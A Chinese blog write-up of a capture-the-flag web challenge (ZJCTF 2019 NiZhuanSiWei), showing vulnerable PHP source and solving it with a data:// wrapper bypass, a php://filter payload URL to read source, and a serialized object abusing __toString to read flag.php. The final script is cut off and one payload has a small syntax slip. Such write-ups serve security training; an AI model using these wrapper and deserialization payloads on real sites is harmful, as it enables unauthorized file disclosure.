buu刷题记录

[ZJCTF 2019]NiZhuanSiWei

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
   
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
   
        echo "Not now!";
        exit(); 
    }else{
   
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
   
    highlight_file(__FILE__);
}
?>

显然要进入include($file),所以第一个if要绕过

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

用data://伪协议绕过

data://变量/plain,内容(或者data://变量/plain;base64 encode,内容)

else{
   
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }

php://filter伪协议

file=php://filter/read=convert.base64-decode/resource=xxx.php

payload:?text=data://text/plain,welcome to the zjctf&file=php://filter/read/convert.base64-encode/resource=useless.php

然后base64解码

<?php  

class Flag{
     //flag.php  
    public $file;  
    public function __tostring(){
     
        if(isset($this->file)){
     
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>  

有一个flag.php

存在file时,独取file的内容,所以另file=flag.php

把file序列化传入password里面吧

这里魔术方法__tostring()的作用是让我们可以直接echo对象

//序列化脚本,直接加在类的后面就行
<?php  

class Flag{
     //flag.php  
    public $file=flag.php;  
    public function __tostring(){
     
        if(isset($this->file)){
     
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ"
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值